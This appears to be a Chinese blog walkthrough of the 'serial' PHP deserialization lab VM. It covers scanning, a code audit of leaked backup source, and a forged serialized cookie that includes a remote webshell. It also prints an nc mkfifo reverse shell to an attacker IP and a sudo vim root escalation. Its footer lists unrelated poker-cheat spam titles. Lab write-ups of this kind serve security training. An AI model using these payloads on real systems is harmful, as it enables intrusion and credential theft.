反序列化靶机serial
创始人
2024-11-15 23:07:20
0

1.创建虚拟机

2.渗透测试过程

探测主机存活(目标主机IP地址)

使用nmap探测主机存活或者使用Kali里的netdicover进行探测

-PS/-PA/-PU/-PY:这些参数即可以探测主机存活,也可以同时进行端口扫描。(例如:-PS,发送TCP SYN包进行主机探测

访问

首先访问80端口 F12查看源代码,那我们查看cookie

O:4:"User":2:{s:10:" User name";s:3:"sk4";s:9:" User wel";O:7:"Welcome":0:{}} o:代表存储的是对象(object),如果传入的是一个数组,那它会变成字母a。 4:表示对象的名称有4个字符。User表示对象名称,刚好是4个字符。 2:表示有2个值 s:表示字符串,数字表示字符串的长度,s:10:" User name"; 

使用工具进行扫描,这里扫到一个/backup/目录

打开查看,是一个zip文件,下载查看,是三个源代码文件

通过代码审计得知,首先index.php文件包含了user.class.php文件,对cookie中的user参数进行了序列化和base64编码,然后user.class.php文件包含了log.class.php,且定义了两个类,分别是Welcome和User,并调用了log.class.php文件中的handler函数。log.class.php文件又定义了Log类和成员变量type_log,且handler函数对变量还进行了文件包含和输出

构造payload

wel = new Log();   } } $obj = new User(); echo base64_encode(serialize($obj)); 

抓包

Get shell

生成一个shell 放在www下9.txt

然后构造payload,尝试读取passwd文件,payload如下 新创建一个1.php在本地的www下 然后 把type_log参数后面记得改成自己上传到本地的一句话木马

wel = new Log();   } } $obj = new User(); echo base64_encode(serialize($obj));

 改为本机的www下的

将生成的64编码放到重放器中

 

输入 rm+/tmp/f%3bmkfifo+/tmp/f%3bcat+/tmp/f|/bin/sh+-i+2>%261|nc+192.168.87.128+7777+>/tmp/f

kali监听成功

查看文件,多返回几次上级目录,找到一个txt文件

查看,得到账号密码

远程连接 成功进入

尝试提权,试试sudo vim,进入到命令模式输入!bash

提权成功

相关内容

热门资讯

大纲f辅助!wpk俱乐部有没有... 大纲f辅助!wpk俱乐部有没有辅助,wepoker祈福有用吗,必备教程(有挂详情)1、该软件可以轻松...
方针f辅助!红龙poker辅助... 方针f辅助!红龙poker辅助器免费观看,wepoker插件下载,解迷教程(有人有挂)1、许多玩家不...
手册f辅助!大菠萝789辅助器... 手册f辅助!大菠萝789辅助器下载,wepoker破解器,专业教程(有挂细节)1、每一步都需要思考,...
策略f辅助!wepoker怎么... 策略f辅助!wepoker怎么拿到好牌,aapoker透视插件,详细教程(有挂攻略)1)wepoke...
法子f辅助!wepoker辅助... 法子f辅助!wepoker辅助器激活码,聚星ai辅助工具下载,详细教程(竟然有挂)1、玩家可以在聚星...
手筋f辅助!xpoker怎么作... 手筋f辅助!xpoker怎么作弊,wejoker手机版透视脚本,详情教程(有挂方针)1、wejoke...
讲义f辅助!wepokerpl... 讲义f辅助!wepokerplus开挂,wepoker辅助工具,普及教程(揭秘有挂)1、不需要AI权...
学习f辅助!pokemomo辅... 学习f辅助!pokemomo辅助软件,newpoker脚本,分享教程(真的有挂)1、每一步都需要思考...
经验f辅助!aapoker辅助... 经验f辅助!aapoker辅助工具安全吗,sohoopoker辅助,有挂教程(有挂解密)暗藏猫腻,小...
模块f辅助!wepoker怎么... 模块f辅助!wepoker怎么挂飞机,hhpkoer辅助器视频,有挂教程(发现有挂)1、实时hhpk...